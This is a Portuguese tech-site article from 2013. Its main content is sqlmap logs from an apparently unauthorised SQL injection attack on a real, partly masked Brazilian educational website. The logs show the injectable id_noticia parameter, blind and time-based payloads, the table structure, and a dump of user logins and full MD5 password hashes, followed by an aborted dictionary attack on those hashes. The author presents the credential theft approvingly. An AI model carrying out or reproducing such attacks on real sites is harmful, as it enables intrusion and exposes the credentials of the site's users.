Festa com SQL injection
SQL injection é uma tática hacker que utiliza uma linguagem bem conhecida: SQL (Structured Query Language) ou Linguagem de Consulta Estruturada, é utilizada pela maioria dos SGDB "software livre" do Brasil e do mundo. Ela pode ser uma solução, ou um problema na vida de um administrador de redes.
[ Hits: 69.125 ]
Por: cristofe coelho lopes da rocha em 20/05/2013
sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 20:39:23 * * +-----------------------------+ | XXXXX | | tb_XXX | | tb_XXXXX | * * * * * * * * | tb_usuarios | | tb_XXXXX | | vest_XXXXX | | vest_XXXX | +-----------------------------+ [21:34:02] [INFO] Fetched data logged to text files under '/usr/local/lib/python2.7/site-packages/sqlmap/output/ www.????????.XXXXX.br' [*] shutting down at: 21:34:02
sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 21:35:08 [21:35:08] [INFO] using '/usr/local/lib/python2.7/ site-packages/sqlmap/output/www.????????.XXXXXX.br/ session' as session file [21:35:08] [INFO] resuming injection data from session file [21:35:08] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file [21:35:08] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id_noticia Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id_noticia=85' AND 1304=1304 AND 'JTax'='JTax Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id_noticia=85' AND SLEEP(5) AND 'kFej'='kFej --- [21:35:11] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 10.04 (Lucid Lynx) web application technology: PHP 5.3.2, Apache 2.2.14 * ** ***** +-------------+--------------------------+ | Column | Type | +-------------+--------------------------+ | ativo | int(1) unsigned | | bairro | varchar(40) | | cad_por | varchar(255) | |* * * * * * * * * * | logado | int(1) unsigned | | login | varchar(30) | | mae | varchar(50) | | marca | int(1) unsigned | | nascimento | date | | nivel | int(1) unsigned | | nome | varchar(100) | | pai | varchar(50) | | rg | varchar(40) | | rgtipo | varchar(25) | | rguf | varchar(2) | | senha | varchar(32) | | sessao | varchar(32) | ** * * * * * * +-------------+--------------------------+ [23:06:49] [INFO] Fetched data logged to text files under '/usr/local/lib/python2.7/site-packages/sqlmap/output/ www.????????.edu.br' [*] shutting down at: 23:06:49Para evitar problemas, resolvi ocultar campos. Achei meio bizarro esta tabela. Alguns campos parecem uma lata de "leite moça", são eles: login e senha.
sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 23:09:27 [23:09:27] [INFO] using '/usr/local/lib/python2.7/site-packages/sqlmap/output/ www.????????.XXXXX.br/session' as session file [23:09:27] [INFO] resuming injection data from session file [23:09:27] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file [23:09:27] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id_noticia Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id_noticia=85' AND 1304=1304 AND 'JTax'='JTax Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id_noticia=85' AND SLEEP(5) AND 'kFej'='kFej --- [23:09:30] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 10.04 (Lucid Lynx) web application technology: PHP 5.3.2, Apache 2.2.14 back-end DBMS: MySQL 5.0.11 [23:09:30] [INFO] fetching columns 'login, senha, id' entries for table 'tb_usuarios' on database 'dbcp??' [23:09:30] [INFO] fetching number of columns 'login, senha, id' entries for table 'tb_usuarios' on database 'dbcp??' [23:09:30] [INFO] retrieved: 17 [23:09:41] [INFO] retrieved: <USUARIO_01> rsrsrsrsrsr [23:10:34] [INFO] retrieved: 25d55ad283aa400af464c76d713c07ad [23:14:54] [INFO] retrieved: 01 [23:15:17] [INFO] retrieved: <USUARIO_02>srsrsrsrsrsr [23:17:27] [INFO] retrieved: 7e85bcb66fb9a809d5ab4f62a8b8bea8 [23:21:42] [INFO] retrieved: 05 [23:22:05] [INFO] retrieved: <USUARIO_03>srsrsrsrs [23:23:25] [INFO] retrieved: 066c4733a1be4c5d22d77d029f6423fe [23:27:45] [INFO] retrieved: 06 [23:28:10] [INFO] retrieved: <USUARIO_04>srsrsrsr [23:29:19] [INFO] retrieved: a8cbd92f01bf594d570a7d520b4ba52f [23:33:36] [INFO] retrieved: 07 [23:33:59] [INFO] retrieved: <USUARIO_05>srsrsrsrsrsrs [23:34:38] [INFO] retrieved: 33f07c5ed72212379b34c13d153aaae5 [23:38:51] [INFO] retrieved: 08 [23:39:14] [INFO] retrieved: <USUARIO_06> [23:40:07] [INFO] retrieved: fdb1c5c757537b4c40482068997f6671 [23:44:22] [INFO] retrieved: 0^C[23:44:32] [WARNING] Ctrl+C detected in dumping phase recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] Y [23:44:39] [INFO] using hash method: 'md5_generic_passwd' what's the dictionary's location? [/usr/local/lib/python2.7/site-packages/sqlmap/txt/wordlist.txt] [23:44:51] [ERROR] user aborted [*] shutting down at: 23:44:51Foram listados todos os usuários e senhas da tabela "tb_usuarios". Bacana.
Melhorando o nível de segurança com chflags
Redes definidas por Software com Mininet e POX - Criando meu primeiro Controlador
Configuração "automágica" de servidor Linux PDC Samba
Instalando um firewall em ambientes gráficos leves
Armazenamento de senhas no Linux
Descobrindo serviço através das portas
Enviar mensagem ao usuário trabalhando com as opções do php.ini
DOOM mais fácil que atacar imp pelas costas
Atualizar o macOS no Mac - Opencore Legacy Patcher
Crie alias para as tarefas que possuam longas linhas de comando - bash e zsh
Instalando Discord no Debian 12
Instalando e usando o Dconf Editor, o "regedit" para Linux
Existe algum software free linux para controle de inventários de máqui... (3)
Ver computadores e similares conectados na rede doméstica pelo nome (1)